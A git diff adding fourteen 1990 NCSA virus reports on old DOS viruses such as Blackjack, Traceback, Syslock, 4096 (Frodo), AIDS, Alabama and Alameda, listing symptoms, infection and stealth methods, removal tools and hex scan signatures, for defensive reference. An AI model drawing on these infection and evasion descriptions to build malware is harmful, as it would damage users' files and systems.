diff --git a/textfiles.com/virus/NCSA/ncsa009.txt b/textfiles.com/virus/NCSA/ncsa009.txt new file mode 100644 index 00000000..6bab59b5 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa009.txt 
@@ -0,0 +1,115 @@ + Ŀ + VIRUS REPORT + 1704 Format + + +Synonyms: Blackjack, 1704, Falling Letters. + +Date of Origin: September, 1988. + +Place of Origin: Germany. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM files. + +Increase in Size of Infected Files: 1704 bytes. + +Nature of Damage: Affects system run-time + operation. Corrupts program or overlay files. Formats or erases + all/part of the hard disk upon activation. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro + -Scan. + +Removed by: CleanUp, M-1704, Scan/D, F-Prot. + +Derived from: 1701 (Cascade) virus. + +Scan Code: Uses self-encryption. FA 8B EC E8 + 00 00 5B 81 EB 31 01 2E F6 87 2A 01 01 74 0F 8D B7 4D 01 BC + 85 06 31 34 31 24 46 4C 75 F8. + + The code for the 1704 virus is identical to the 1701 except for a +single instruction. The only differences are the removal of a +conditional jump from the 1701 (which would never have been taken), and +some necessary segment overrides on the BIOS tests missing in the +previous version. The virus was designed to not infect micros +manufactured by IBM, but errors in coding enable it to infect any PC, +regardless of origin. The virus tests the BIOS for the string "COPR. +IBM", and contains code to not infect if it finds this - however there +are errors in the code which prevent it from working. + + As with the 1701, the 1704 can recognize if it has previously +infected a file. However, because recognition depends on the length of +the virus, it will infect programs already infected by variants with +different lengths. (1701 will infect COM files infected with 1704, and +vice versa.) + + The encryption of this virus is different in each instance of the +virus, being dependent on the size of the host file. + + The hard disk is formatted when the virus activates. + + This virus has been termed "Blackjack", which is a pun on the German +name "17+4" of a popular card game. 
+ + Blackjack infects only COM-files which are at least 3 bytes long, and +it does so only once for any given file. It overwrites the first three +bytes with a JMP to the beginning of the viral code, which is appended to +the file. The 2 byte address of this JMP instruction is probably the +reason why only COM files are susceptible to infection. Blackjack +retains the file's time stamp. It even infects read-only files; on +write-protected floppy disks, it attempts writing 5 times per file, thus +revealing its activity. + + In the infected file, the viral code is cryptographically encoded, +using a simple Vigenere code depending on the length of the file; only +the instructions for decoding the encrypted part of the code are in plain +machine-language. This is obviously intended as a impediment against +disassembling. Hence, every copy of the virus looks different +(depending on the length of the file). + + On invocation of an infected program, Blackjack installs itself in +RAM (if no copy is already installed), then replaces the JMP instruction +with its former contents and resumes normal program operation. + + The storage map shows that Blackjack has tinkered with the free +storage pointer-chain to hide the fact that it has hooked interrupt 21. +Hence, only a minor part of Blackjack is visible in the storage map. + + In every year, from October to December, Blackjack will interfere +with CGA or EGA operated screens, moving randomly chosen characters +down, like falling leaves in autumn. After a while, you'll have a big +heap of characters at the bottom of your screen, and as you cannot see +anymore what the computer is trying to display, you'll probably have to +restart the system. This behaviour has been predicted by two people, who +have disassembled Blackjack, and has later been observed on many +EGA-equipped ATs. 
+ + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa010.txt b/textfiles.com/virus/NCSA/ncsa010.txt new file mode 100644 index 00000000..b22b0426 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa010.txt 
@@ -0,0 +1,50 @@ + Ŀ + VIRUS REPORT + 1720 Virus + + +Synonyms: PSQR Virus + +Date of Origin: March, 1990. + +Place of Origin: Barcelona, Spain. + +Host Machine: PC compatibles. + +Host Files: COM, EXE, and overlay files. + Becomes memory resident. + +Increase in Size of Infected Files: n/a. + +Detected by: Scanv61+ + +Removed by: Scan/D, or delete the infected files. + +Derived from: Jerusalem. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa011.txt b/textfiles.com/virus/NCSA/ncsa011.txt new file mode 100644 index 00000000..407268c8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa011.txt 
@@ -0,0 +1,52 @@ + Ŀ + VIRUS REPORT + 2930 + + +Synonyms: Traceback II + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE + files. + +Increase in Size of Infected Files: 2930 bytes. + +Nature of Damage: Corrupts program or overlay files. + +Detected by: Scanv41+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or delete infected files. + +Derived from: may be original. See 3066/Traceback. + + Traceback II may be the predecessor of the Traceback (3066) virus, +though the latter was discovered first. They are similar in function, +but produce differences in the size of infected files. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa012.txt b/textfiles.com/virus/NCSA/ncsa012.txt new file mode 100644 index 00000000..8506a2df --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa012.txt 
@@ -0,0 +1,84 @@ + Ŀ + VIRUS REPORT + 3066 + + +Synonyms: Traceback. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects COM, EXE files. + +OnScreen Symptoms: Cascading display one hour after activation, lasting +one minute, followed by restoration of screen to condition prior to +cascade. + +Increase in Size of Infected Files: 3066 bytes. + +Nature of Damage: Corrupts COM and EXE files. + +Detected by: Scanv56+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: M-3066, VirClean, F-Prot, or delete any infected files. + +Derived from: Traceback II/2930. + +Scan Code: E8 71 06 E8 28 06 B4 19 CD 21 89 B4 51 01 81 84 51 01 84 08 8C +8C 53 01. You can also search at 108H for 89 B4 51 01 81 84 51 01 84 08. + + After an infected program is run, Traceback becomes memory resident, +infecting every COM or EXE that is run. Additionally, if the system date +is after December 5, 1988, it will attempt to infect one additional COM +or EXE file in the current directory. If no uninfected file are available +in the current directory, it searches the entire disk, starting at the +root directory, looking for a victim. This search terminates if it +encounters an infected file before finding a candidate non-infected +file. + + This virus derives its name from two characteristics: + +* Infected files contain the directory path of the file causing the + infection within the viral code. Consequently, it is possible to + "trace back" the infection through a number of files. + +* When Traceback succeeds in infecting a program, it attempts to + update a counter in the program from which Traceback was + activated in that session. Because Traceback takes over disk error + handling while trying to update the original infected program, the + user will be unaware that an error occurred if Traceback can't + update its counter. 
+ + The primary symptom of the Traceback virus having infected the +system is that it will produce a screen display with a cascading effect +similar to the Cascade/1701/1704 virus. The cascading display occurs one +hour after system memory is infected, and lasts one minute, after which +the display is restored. Any keystroke during this interval will hang up +the system. The cascade/restore sequence is repeated at one hour +intervals. See also 2930. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa013.txt b/textfiles.com/virus/NCSA/ncsa013.txt new file mode 100644 index 00000000..68972c43 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa013.txt 
@@ -0,0 +1,63 @@ + Ŀ + VIRUS REPORT + 3551 Virus + + +Synonyms: Syslock, 3555 + +Host Machine: PC compatibles. + +Host Files: Encrypting, non-resident. Infects COM, EXE files. + +Increase in Size of Infected Files: 3551-3555 bytes. + +Nature of Damage: Corrupts COM and EXE files. May corrupt data files. + +Detected by: Scanv56+, F-Prot, Pro-Scan. + +Removed by: CleanUp, Scan/D, or F-Prot. + +Scan Code: Uses self-encryption. + + When an infected program is run, SysLock searchs through the COM and +EXE files and subdirectories on the current disk, picking one executable +file at random to infect. The infected file will have its length +increased by about 3,551 bytes. + + The SysLock virus will damage files by searching for the word +"Microsoft" in any combination of upper and lower case characters, and +when found replace the word with either "MACROSOFT". If it finds an +environment variable of "SYSLOCK" has been set to "@" (hex 40), the virus +will not infect any programs or perform string replacements, but will +instead pass control to its host immediately. The author may have used +this during the creation of the virus. + + One known variant is called Macho-A. It is identical to the SysLock +virus, except that "Microsoft" is replaced with "MACHOSOFT". + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa014.txt b/textfiles.com/virus/NCSA/ncsa014.txt new file mode 100644 index 00000000..7b723911 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa014.txt 
@@ -0,0 +1,44 @@ + Ŀ + VIRUS REPORT + 3555 + + +Host Machine: PC compatibles. + +Host Files: COMMAND.COM, COM files. + +Increase in Size of Infected Files: 3555 bytes. + +Scan Code: encrypted. + + It does not appear to be memory resident, and infects COM files at +the time that an infected program is loaded. It does not appear to be +memory resident. It sometimes causes the message -"Error Writing to +Device AUX1" to occur at the time an infected program is executed. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa015.txt b/textfiles.com/virus/NCSA/ncsa015.txt new file mode 100644 index 00000000..185314f8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa015.txt 
@@ -0,0 +1,82 @@ + Ŀ + VIRUS REPORT + 4096 virus + + +Synonyms: Century Virus, IDF Virus, Stealth Virus, 100 Years Virus + +Date of Origin: January, 1990. + +Host Machine: PC compatibles. + +Increase in Size of Infected Files: 4096 bytes. + +Nature of Damage: Remains resident. Infects COMMAND.COM, COM, EXE, +overlay files. + +Detected by: Scanv53+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot. See below. + + This virus is one of the most brutal ever developed, and no one seems +to successfully recover from it. It infects COM, EXE, and overlay files, +adding 4,096 bytes to their length. Once the virus is resident in memory, +the increase in length will not appear in a directory listing, and it +will infect any executable file that is opened, including those opened +with the COPY or XCOPY command. + + Through FAT manipulation, the virus destroys files through a slow +crosslinking process that would seem to be a hardware problem. + + If the virus is present in memory and you attempt to copy infected +files, the new copy of the file will not be infected if the extension is +neither COM nor EXE. Thus, one way to disinfect a system is as follows: + +* copy all the infected files to diskettes with a non-executable file + extension. For instance, you might COPY *.EXE *.E and COPY + *.COM *.C. + +* Shut the system off. Reboot from an uninfected and write-protected + disk. + +* Delete any infected files and restore the backed up files to the + original executable file names and extensions. (COPY *.C *.COM; COPY + *.E *.EXE) + + This procedure will not save any cross-linked files, however. + + Some notes: + +* Systems infected with this virus may hang after September 22 of any + year, due to a bug. This is the birthday of Bilbo and Frodo Baggin, in + the Lord of the Rings. + +* The virus contains an unused boot sector, which if copied to the boot + sector of a diskette, will produce the message "FRODO LIVES". 
+ + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa016.txt b/textfiles.com/virus/NCSA/ncsa016.txt new file mode 100644 index 00000000..def46ee8 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa016.txt 
@@ -0,0 +1,67 @@ + Ŀ + VIRUS REPORT + AIDS + + +Synonyms: VGA2CGA, Taunt, Hahaha. + +Host Machine: PC compatibles. + +Host Files: COM files. + +OnScreen Symptoms: When activated, displays "Your computer now has +AIDS". The word "AIDS" covers about half the screen. Following display +of this message, the system halts and must be rebooted.. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Overwrites first 13K of infected programs. Not memory- +resident. + +Detected by: Scanv40+, Pro-Scan. + +Removed by: CleanUp, or Scan/D, or delete infected .COM files. + + The AIDS virus was first reported attached to a program called +VGA2CGA. It is known as "Hahaha" in Europe, and IBM refers to it as the +"Taunt" virus. When it activates, it displays the message "Your computer +now has AIDS". After the message display, the system is halted. You will +need to turn it off and reboot to restart it. + + The only protection against the AIDs virus is full backups of your +.COM files. Written in Turbo C, it copies itself over the first 13K bytes +of a .COM file. The original function of the .COM program is lost, and +any other .COM files locatable by the program are also overwritten in +this manner. It evidently has a minimum size which it will not infect, +but it also totally loses all the data at the beginning of the programs. +Recovery of a damage program is not possible. + + This virus should not be confused with the AIDS Information Disk +Trojan. See also the Lisbon virus. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. 
This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa017.txt b/textfiles.com/virus/NCSA/ncsa017.txt new file mode 100644 index 00000000..81529c78 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa017.txt 
@@ -0,0 +1,65 @@ + Ŀ + VIRUS REPORT + AIDS II Virus + + +Synonyms: Companion Virus + +Date of Origin: April, 1990. + +Place of Origin: The Netherlands? + +Host Machine: PC compatibles. + +Host Files: non-resident. Infects COM and EXE files. + +OnScreen Symptoms: See messages below. Also a melody is played. + +Increase in Size of Infected Files: 8,064 bytes. + +Nature of Damage: none. + +Detected by: on-screen message. + +Removed by: delete COM files created by the virus. They will bear the +date and time of infection. + + This virus does not infect files, but rather creates a 8,064 byte COM +file of the same name as an existing EXE file. When a user enters the +first name of the EXE file, the COM file runs, a melody is played, and +the COM file displays the message: "Your computer is infected with... +(heart character) Aids Virus II. - Signed WOP & PGT of DutchCrack - ". +The COM file then "spawns" the EXE file's process -- permits the normal, +uninfected EXE to run, after which control is returned to the COM file. +At this time, the melody is played again, and the message displayed is +"Getting used to me? Next time, use a condom..." + + The virus is significant in that it "infects" a file without touching +it at all, and thus escapes detection by CRC examination programs. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. 
Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa018.txt b/textfiles.com/virus/NCSA/ncsa018.txt new file mode 100644 index 00000000..eb8525e6 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa018.txt 
@@ -0,0 +1,77 @@ + Ŀ + VIRUS REPORT + Alabama Virus + + +Date of Origin: October 13, 1989. + +Place of Origin: Israel. + +Host Machine: PC compatibles. + +Host Files: Remains resident. Infects EXE files. + +OnScreen Symptoms: One hour after activation, the virus displays this +message in a flashing box: + +"SOFTWARE COPIES PROHIBITED BY INTERNATIONAL LAW + +Box 1055 Tuscambia ALABAMA USA." + +Increase in Size of Infected Files: 1560 bytes. + +Nature of Damage: Affects system run-time operation. Corrupts program or +overlay files. Directly or indirectly corrupts file linkage. + +Detected by: Scanv43+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, F-Prot, or delete infected files. + + This virus was isolated by Ysrael Radai at Hebrew University. It +manipulates the file allocation table and swaps file names so that files +are slowly lost. + + The Alabama virus will infect .EXE files, increasing their size by +1,560 bytes. It moves into memory when any EXE containing the virus is +executied. Unlike most other memory-resident viruses, the Alabama does +not use the normal TSR function, but rather hooks interrupt 9 as well as +IN and OUT commands. Upon detecting a Control-Alt-Delete, the virus +generates what appears to be a warm boot, but remains in memroy. The +virus loads to the top 30K of memory, unlike other memory-resident +programs, and does not reduce the available memory reported by DOS. + + The Alabama virus uses a complex procedure during infection. It will +first infect an EXE in the current directory, providing there is one +which is uninfected. If all EXEs in the current directory are infected, +then the Alabama virus will infect the program being executed -- +provided the system date is not Friday. On Fridays, the Alabama virus +will swap entries in the FAT so that when the user attempts to execute an +uninfected file, an infected file executes instead. Over time, files +will be lost through this process. 
+ + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa019.txt b/textfiles.com/virus/NCSA/ncsa019.txt new file mode 100644 index 00000000..d68af8ae --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa019.txt 
@@ -0,0 +1,115 @@ + Ŀ + VIRUS REPORT + Alameda Virus + + +Synonyms: Yale, Merritt, Peking, Seoul virus. + +Date of Origin: Spring, 1987. + +Place of Origin: Merritt College, Alameda, California. + +Host Machine: PC compatibles. Does not run on 80286. + +Host Files: Remains resident. Infects floppy disk boot sector. + +Increase in Size of Infected Files: n/a. + +Nature of Damage: Resident. Corrupts or overwrites floppy boot sector. + +Detected by: Scanv56+, F-Prot, IBM Scan. + +Removed by: CleanUp, MDisk, F-Prot, or DOS SYS command.. + +Scan Code: BB 40 00 8E DB A1 13 00 F7 E3 2D E0 07 8E C0 0E 1F 81 FF 56 34 +75 04 FF 0E F8 7D. You can also search at offset 00EH for A1 13 00 F7 E3 +2D E0 07. + +History: First discovered at Merritt college in California in the Spring +of 1987. In February, 1988, it popped up at Alameda College, where it +received large publicity. In October, 1988, it surfaced at Yale +University, where it became known as the Yale virus. The original +version caused no intentional damage. + + The original Alameda would only run on an 8088/8086, and was +presumably assembled using A86 on such a machine. Because it does not +infect hard disks, we may presume that the author's machine did not have +one. The original version would not run on an 80286 or an 80386 machine, +although it will infect on such a machine. Later versions of the virus +can run on an 80286. + +Description of Operation: The Alameda virus spends its life in the boot +sector of 5.25" 360K floppy disks. When the machine boots from an +infected 360K floppy, the Alameda becomes memory resident, occupying 1K +of memory. It infects 360K floppies in the A: drive only. Pressing +Ctrl-Alt-Del activates the virus, rather than removing it from memory. +At this point, it looks for a floppy in drive A: to infect. It will +infect any 360K disk in that drive, whether or not it is a bootable disk. + + The original boot sector is held in track thirty-nine, head zero, +sector eight. 
It does not map this sector bad in the FAT (unlike the +Brain) and should that area be used by a file, the virus will die. It +apparently uses head 0, sector 8 and not head 1 sector 9 because this is +common to both single sided and double sided formats and common to both +8-sectored and 9-sectored formats (both the old 160K single sided and +later 180K single sided formats). + + Alameda redirects the keyboard interrupt (INT 09H) to look for +Ctrl-Alt-Del sequences. When it detects Ctrl-Alt-Del, it will attempt to +infect any floppy it finds in drive A:. + + The virus is not malevolent. It contains code to format track +thirty-nine, head zero, but this has been disabled. It also contains a +count of the number of times it has infected other diskettes, although it +is referenced for write only and is not used as part of an activation +algorithm. The virus remains resident at all times after it is booted, +even if the user removes the floppy from a machine having no bootable +hard disk, and reboots with Ctrl-Alt-Del. When Ctrl-Alt-Del is pressed +from inside Cassette Basic, it activates and infects the floppy from +which the user is attempting to boot. + + Alameda contains no anti-detection mechanisms as does the Brain +virus. + + The Alameda contains a rare POP CS instruction that is not understood +by 80286 systems, and hangs the system up. The POP CS command is used to +pass control to itself in upper memory. When such a machine hangs, the +virus has already installed itself in high RAM and hooked the keyboard +interrupt, so that the infection can spread if a warm boot is then +performed. + +Removal: Alameda can not only live through an Ctrl-Alt-Del reboot +command, but this is its only means of reproduction to other floppy +diskettes. The only way to remove it from an infected system is to turn +the machine off and reboot with an uninfected copy of DOS. 
The Norton +utilities can be used to identify infected diskettes by looking at the +boot sector and the DOS SYS utility can be used to remove it <197> unlike +the Brain. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa020.txt b/textfiles.com/virus/NCSA/ncsa020.txt new file mode 100644 index 00000000..6fa31c21 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa020.txt 
@@ -0,0 +1,42 @@ + Ŀ + VIRUS REPORT + Alameda-B + + +Synonyms: Sacramento Virus, Yale C + +Host Machine: PC compatibles. + +Derived from: Alameda + + This is the original Alameda Virus that has the POP CS removed. +Relocation is accomplished through a long jump instruction. All other +characteristics are identical. This version, unlike the original +Alameda, runs on a 286. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa021.txt b/textfiles.com/virus/NCSA/ncsa021.txt new file mode 100644 index 00000000..61bdc627 --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa021.txt 
@@ -0,0 +1,42 @@ + Ŀ + VIRUS REPORT + Alameda-C + + +Host Machine: PC compatibles. + +Derived from: Alameda-B + + This is the Alameda-B virus that has been modified to disable the +boot function after 100 infections. The counter in the original Alameda +virus has been re-activated and is interrogated at each bootup. When it +reaches 100, the virus disconnects from the original boot sector +(control is no longer passed) and the diskette will no longer boot. At +infection time, the counter is zeroed on the host diskette. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa022.txt b/textfiles.com/virus/NCSA/ncsa022.txt new file mode 100644 index 00000000..cab47ddc --- /dev/null +++ b/textfiles.com/virus/NCSA/ncsa022.txt 
@@ -0,0 +1,54 @@ + Ŀ + VIRUS REPORT + Amstrad Virus + + +Date of Origin: Reported in November, 1989 by Jean Luz, an NCSA member. +Known for about one year prior to that in Spain and Portugal. + +Place of Origin: Spain and Portugal + +Host Machine: PC compatibles. + +Host Files: COM files other than COMMAND.COM. Not memory resident. + +OnScreen Symptoms: Displays a fake advertisement for the Amstrad +computer. + +Increase in Size of Infected Files: 847 bytes. + +Nature of Damage: May corrupt program or overlay files. + +Detected by: Scanv51+, F-Prot, IBM Scan, Pro-Scan. + +Removed by: CleanUp, Scan/D, F-Prot, or simply erase the infected files. + + This virus appears to cause no damage beyond replication, which may +occasionally damage a COM file. + + +ͻ + This document was adapted from the book "Computer Viruses", + which is copyright and distributed by the National Computer + Security Association. It contains information compiled from + many sources. To the best of our knowledge, all information + presented here is accurate. + + Please send any updates or corrections to the NCSA, Suite 309, + 4401-A Connecticut Ave NW, Washington, DC 20008. Or call our BBS + and upload the information: (202) 364-1304. Or call us voice at + (202) 364-8252. This version was produced May 22, 1990. + + The NCSA is a non-profit organization dedicated to improving + computer security. Membership in the association is just $45 per + year. Copies of the book "Computer Viruses", which provides + detailed information on over 145 viruses, can be obtained from + the NCSA. Member price: $44; non-member price: $55. + + The document is copyright (c) 1990 NCSA. + + This document may be distributed in any format, providing + this message is not removed or altered. +ͼ + +Downloaded From P-80 International Information Systems 304-744-2253 diff --git a/textfiles.com/virus/NCSA/ncsa023.txt b/textfiles.com/virus/NCSA/ncsa023.txt new file mode 100644 index 00000000..b2a9f02d --- /dev/null 
